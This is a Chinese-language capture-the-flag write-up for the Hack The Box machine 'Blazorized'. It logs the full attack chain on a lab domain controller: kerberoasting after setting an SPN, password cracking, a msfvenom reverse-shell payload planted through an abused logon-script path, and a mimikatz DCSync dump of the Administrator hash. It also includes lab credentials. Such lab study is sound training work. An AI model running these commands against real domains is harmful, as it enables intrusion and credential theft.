靶场:Hack The Box
地址:https://app.hackthebox.com/machines/Blazorized
系统:windows
内容:AD操作、windows计划任务
退役的HTB机器,简要记录学习过程。
扫描常用端口。
~/D/B $nmap -sV -sC -Pn -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 10:12 UTC
Nmap scan report for 10.10.11.22
Host is up (0.20s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://blazorized.htb
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-10 09:58:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-ntlm-info:
| 10.10.11.22\BLAZORIZED:
| Target_Name: BLAZORIZED
| NetBIOS_Domain_Name: BLAZORIZED
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: blazorized.htb
| DNS_Computer_Name: DC1.blazorized.htb
| DNS_Tree_Name: blazorized.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.22\BLAZORIZED:
| Instance name: BLAZORIZED
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
| TCP port: 1433
|_ Clustered: false
|_ssl-date: 2024-12-10T09:58:57+00:00; -14m09s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-12-10T09:27:38
|_Not valid after: 2054-12-10T09:27:38
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-10T09:58:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -14m09s, deviation: 0s, median: -14m09s将域名加入hosts,扫描子域名。
~/D/B $gobuster vhost -u http://$DOMAIN -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
Found: admin.blazorized.htb Status: 200 [Size: 2047]
Found: api.blazorized.htb Status: 404 [Size: 0]80端口是一个Blazor WebAssembly 构建的服务,没什么兴趣研究,跟着wp拿到shell。
~/D/B $rlwrap nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.11.22 49223
Microsoft Windows [Version 10.0.17763.5933]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
blazorized\nu_1055用户nu_1055,通过给用户RSA_4810添加SPN,然后可以得到TGT的hash。
Run powershell.
PS C:\Users\NU_1055> IEX(New-Object Net.WebClient).downloadString('http://10.10.16.7/PowerView.ps1')
PS C:\Users\NU_1055> Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='htb/softyhack'}
PS C:\Users\NU_1055> Get-DomainUser RSA_4810 -SPN | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser RSA_4810 -SPN | Get-DomainSPNTicket -Format Hashcat
SamAccountName : RSA_4810
DistinguishedName : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
ServicePrincipalName : htb/softyhack
TicketByteHexStream :
Hash : $krb5tgs$23$*RSA_4810$blazorized.htb$htb/softyhack*$A811745BA1F54E80B6EF0BBDDE87CB8D$08C5A93F003
5DA16B8D858E0ADF6DE44650B8A96CE3F7ADDCB27A641D3BAACA907A861A97D35F7EB837C03B6C3117BE74602D8276D6
... A36C021F1225BBA68323CBB15A977505B51DDF352A302F08583D23A84EF821509A2CA43B32C0EFE051D87AABDF59678F
5D2B0破解hash得到密码。
~/D/B $john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(Ni7856Do9854Ki05Ng0005 #) (?)
1g 0:00:00:05 DONE (2024-12-10 12:44) 0.1858g/s 2661Kp/s 2661Kc/s 2661KC/s (alejo)..(Camisha)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.这个密码可以登录shell。
~/D/B $netexec smb $IP -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
SMB 10.10.11.22 445 DC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.22 445 DC1 [+] blazorized.htb\RSA_4810:(Ni7856Do9854Ki05Ng0005 #)
~/D/B $netexec winrm $IP -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
WINRM 10.10.11.22 5985 DC1 [*] Windows 10 / Server 2019 Build 17763 (name:DC1) (domain:blazorized.htb)
WINRM 10.10.11.22 5985 DC1 [+] blazorized.htb\RSA_4810:(Ni7856Do9854Ki05Ng0005 #) (Pwn3d!)rsa_4810用户并没有直接可以控制的对象。这里是一个难点,实际上,用户ssa_6010有一个计划任务,每隔一分钟会执行特点目录中的脚本。
先生成一个shell脚本。
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.16.7 lport=2234然后传到靶机上。
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> copy \\10.10.16.7\kali\start.bat .\
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> dir
Directory: C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/29/2024 2:34 PM 113EB3B0B2D3
...
d----- 5/29/2024 2:33 PM F1D30FCB0100
d----- 5/29/2024 2:33 PM FD33C0CE11AC
-a---- 5/29/2024 2:33 PM 0 02FCE0D1303F.bat
-a---- 12/10/2024 7:21 AM 1583 start.bat然后给ssa_6010用户设置scriptPath属性。
Set-ADUser -Identity SSA_6010 -ScriptPath 'C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23\start.bat'
*Evil-WinRM* PS C:\windows>net user ssa_6010
User name SSA_6010
Full Name SSA_6010
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/25/2024 11:56:55 AM
Password expires Never
Password changeable 2/26/2024 11:56:55 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23\start.bat
User profile
Home directory
Last logon 12/10/2024 7:18:45 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Super_Support_Adminis
The command completed successfully.等一分钟就会得到反弹shell。
~/D/B $rlwrap nc -nlvp 2234
Listening on 0.0.0.0 2234
Connection received on 10.10.11.22 49857
Microsoft Windows [Version 10.0.17763.5936]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
blazorized\ssa_6010由于ssa_6010具有DCSync权限,上传mimikatz,得到admin的hash。
.\mimikatz.exe "lsadump::dcsync /domain:blazorized.htb /user:Administrator" exit
.#####. mimikatz 2.2.0 (x86) #18362 Feb 29 2020 11:13:10
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:blazorized.htb /user:Administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 11:54:43 AM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
...最后,来进一步分析一下windows下,为什么用户每隔一分钟会运行特点目录下的脚本。
windows下没有像pspy64一样方便的工具,我们手动查看计划任务。
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ScheduledTask
TaskPath TaskName State
-------- -------- -----
\ CreateExplorerShellUnelevatedTask Ready
\ KillCmdProcesses Ready
\ Script Cleanup Ready
\ SSA_6010_RunScriptPath Ready
\ Start LDAP Ready
\ StartAppPools Ready
\ User_Feed_Synchronization-{B5D... Ready
\ User_Feed_Synchronization-{F8F... Ready
\Microsoft\Windows\ Server Initial Configuration Task Disabled
...注意到其中一项为SSA_6010_RunScriptPath,进一步查看该任务的触发条件和动作。
*Evil-WinRM* PS C:\Users\Administrator\Documents> (Get-ScheduledTask -TaskName "SSA_6010_RunScriptPath").Triggers
Enabled : True
EndBoundary :
ExecutionTimeLimit :
Id :
Repetition : MSFT_TaskRepetitionPattern
StartBoundary :
Delay :
PSComputerName :
*Evil-WinRM* PS C:\Users\Administrator\Documents> (Get-ScheduledTask -TaskName "SSA_6010_RunScriptPath").Triggers.Repetition | Format-List
Duration :
Interval : PT1M
StopAtDurationEnd : False
PSComputerName :
*Evil-WinRM* PS C:\Users\Administrator\Documents> (Get-ScheduledTask -TaskName "SSA_6010_RunScriptPath").Actions
Id :
Arguments : -enc SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEEAYwB0AGkAdgBlAEQAaQByAGUAYwB0AG8AcgB5ADsACgAkAHAAYQB0AHQAZQByAG4AIAA9ACAAIgBeAEEAMwAyAEYARgAzAEEARQBBAEEAMgAzAFwAXAAqACIAOwAKACQAdQBzAGUAcgBuAGEAbQBlACAAPQAgACIAUwBTAEEAXwA2ADAAMQAwACIAO
wAKACQAcABhAHMAcwB3AG8AcgBkACAAPQAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAnAGUAYgAyADMAYgAwADIAOQA5ADUAYwAyAGEAOABkADAAOAA0ACEAZQAzADgANQA5ADYAYgA4ADMAOAA1ADIAYgBmADQAOABkADcAYgBzAGIANwBkADQAZAA3AGYAOABiAGQ
AYgBjADgAZQBlACEANQAwADkANQA1ADQAYwAyAF8AJwAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAOwAKACQAYwByAGUAZABlAG4AdABpAGEAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtA
GEAdABpAG8AbgAuAFAAUwBDAHIAZQBkAGUAbgB0AGkAYQBsACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAdQBzAGUAcgBuAGEAbQBlACwAJABwAGEAcwBzAHcAbwByAGQAOwAKACQAdQBzAGUAcgBzAGMAcgBpAHAAdABQAGEAdABoACAAPQAgACgARwBlAHQALQBBAEQAVQBzAGUAcgAgAC0ASQB
kAGUAbgB0AGkAdAB5ACAAJAB1AHMAZQByAG4AYQBtAGUAIAAtAFAAcgBvAHAAZQByAHQAaQBlAHMAIABzAGMAcgBpAHAAdABQAGEAdABoACkALgBzAGMAcgBpAHAAdABQAGEAdABoADsACgBpAGYAIAAoACQAdQBzAGUAcgBzAGMAcgBpAHAAdABQAGEAdABoACAALQBtAGEAdABjAGgAIAAkAHAAYQB0AHQAZ
QByAG4AKQAgAHsAIAAKACAAIAAkAHUAcwBlAHIAcwBjAHIAaQBwAHQAUABhAHQAaAAgAD0AIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAFkAUwBWAE8ATABcAHMAeQBzAHYAbwBsAFwAYgBsAGEAegBvAHIAaQB6AGUAZAAuAGgAdABiAFwAcwBjAHIAaQBwAHQAcwBcACQAdQBzAGUAcgBzAGMAcgBpAHA
AdABQAGEAdABoACIAOwAKACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlACAAJAB1AHMAZQByAHMAYwByAGkAcAB0AFAAYQB0AGgAIAAtAEMAcgBlAGQAZQBuAHQAaQBhAGwAIAAkAGMAcgBlAGQAZQBuAHQAaQBhAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkA
GQAZQBuADsACgB9ACAAZQBsAHMAZQAgAHsAfQAKAA==
Execute : powershell.exe
WorkingDirectory :
PSComputerName :解密这段base64加密的脚本,得到powershell源码,一切真相大白。
Import-Module ActiveDirectory;
$pattern = "^A32FF3AEAA23\\*";
$username = "SSA_6010";
$password = ConvertTo-SecureString 'eb23b02995c2a8d084!e38596b83852bf48d7bsb7d4d7f8bdbc8ee!509554c2_' -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$password;
$userscriptPath = (Get-ADUser -Identity $username -Properties scriptPath).scriptPath;
if ($userscriptPath -match $pattern) {
$userscriptPath = "C:\Windows\SYSVOL\sysvol\blazorized.htb\scripts\$userscriptPath";
Start-Process -File $userscriptPath -Credential $credential -WindowStyle Hidden;
} else {}